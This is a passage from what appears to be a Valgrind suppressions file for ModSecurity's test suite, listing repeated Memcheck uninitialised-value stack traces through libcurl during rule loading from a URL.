fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_S_copy fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_mutateEmmPKcm fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_appendEPKcm fun:append fun:_ZN11modsecurity5Utils11HttpsClient11handle_implEPcmm obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_S_copy fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_mutateEmmPKcm fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_appendEPKcm fun:append fun:_ZN11modsecurity5Utils11HttpsClient11handle_implEPcmm obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ 